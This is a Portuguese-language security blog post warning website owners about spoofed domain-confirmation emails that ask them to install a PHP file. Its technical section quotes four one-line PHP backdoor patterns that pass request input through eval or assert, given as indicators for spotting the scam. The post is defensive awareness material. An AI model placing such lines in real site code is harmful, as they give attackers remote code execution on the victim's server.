Security Blog
Security Blog
Posted By Gregory

Não confie nesses e-mails falsos de confirmação de domínio.

Se você receber alguma mensagem, de qualquer tipo, solicitando a criação, o download ou a instalação de código PHP em seu site, ignore-a.


English version: Do not trust those fake domain confirmation emails


Recentemente, alguns dos meus clientes receberam e-mails estranhos de seus registradores de domínio. Esses e-mails continham uma solicitação de confirmação de domínios em nome deles. Verifiquei um desses e-mails e rapidamente o identifiquei como fraudulento . Todos os e-mails seguem um padrão idêntico e solicitam a criação de um arquivo PHP na pasta raiz de um site com um nome específico e um conteúdo fornecido. Obviamente, o conteúdo sugerido para esse arquivo PHP contém um código malicioso conhecido como código backdoor. Esse tipo de código permite que o invasor execute qualquer ação que desejar no site da vítima.

Se você receber alguma carta, de qualquer tipo, solicitando a criação, o download ou a instalação de código PHP em seu site, ignore-a. Sem exceções. Mesmo que a carta venha do presidente ou da sua mãe.

Mensagens fraudulentas parecem legítimas devido ao endereço de e-mail do remetente ser legítimo. Mas trata-se de um ataque de spoofing. Você não espera receber um e-mail falso de seus amigos ou do seu registrador de domínio, certo? Errado! Qualquer e-mail pode ter qualquer endereço de remetente. A grande maioria dos servidores e clientes de e-mail não verifica o endereço do remetente. Portanto, você o vê como um sinal de um hacker. Desconfie de qualquer e-mail recebido de um remetente conhecido se ele contiver uma solicitação para alguma ação suspeita, como instalar código em seu site ou aplicativo em seu computador.

Detalhes técnicos

E-mails falsos geralmente contêm algumas das seguintes linhas de código PHP.

assert(stripslashes($_REQUEST['something']));

eval(stripslashes($_REQUEST['something']));

assert(base64_decode($_REQUEST['something']));

eval(base64_decode($_REQUEST['something']));

Para sua informação: base64_decode, eval e assert são indicadores conhecidos de código PHP suspeito ou malicioso.

Veja também: O Plugin Inspector revela problemas de segurança em outros plugins.


I'm a team lead in Cerber Tech. I'm a software & database architect, WordPress - PHP - SQL - JavaScript developer. I started coding in 1993 on IBM System/370 (yeah, that was amazing days) and today software engineering at Cerber Tech is how I make my living. I've taught to have high standards for myself as well as using them in developing software solutions.

View Comments
There are currently no comments.